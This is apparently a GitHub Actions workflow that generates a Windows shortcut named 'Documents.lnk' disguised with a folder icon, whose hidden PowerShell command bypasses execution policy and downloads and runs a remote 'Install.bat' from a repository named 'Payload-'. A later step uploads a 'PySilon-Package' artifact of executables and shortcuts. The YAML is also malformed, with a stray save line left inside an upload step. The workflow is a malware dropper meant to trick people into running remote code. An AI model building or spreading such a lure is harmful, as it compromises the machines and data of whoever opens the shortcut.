name: Generate LNK Only
on: [workflow_dispatch]

jobs:
  build:
    runs-on: windows-latest
    steps:
      - name: Create Stealth Folder Shortcut
        shell: pwsh
        run: |
          $WshShell = New-Object -ComObject WScript.Shell
          $Shortcut = $WshShell.CreateShortcut("$pwd\Documents.lnk")
          $Shortcut.TargetPath = "powershell.exe"
          $Shortcut.Arguments = "-w h -ep bypass -c IEX(iwr 'https://raw.githubusercontent.com/Wizardcargo8080/Payload-/main/Install.bat').Content"
          $Shortcut.IconLocation = "C:\Windows\System32\shell32.dll, 3"
          $Shortcut.WindowStyle = 7
          $Shortcut.Save()

      - name: Upload Shortcut
        uses: actions/upload-artifact@v4
        with:
          name: Folder-Shortcut
          path: "*.lnk" # Added quotes here to fix the Line 34 error
          $Shortcut.Save()

      - name: Upload Result
        uses: actions/upload-artifact@v4
        with:
          name: PySilon-Package
          path: |
            dist/*.exe
            dist/*.lnk
 
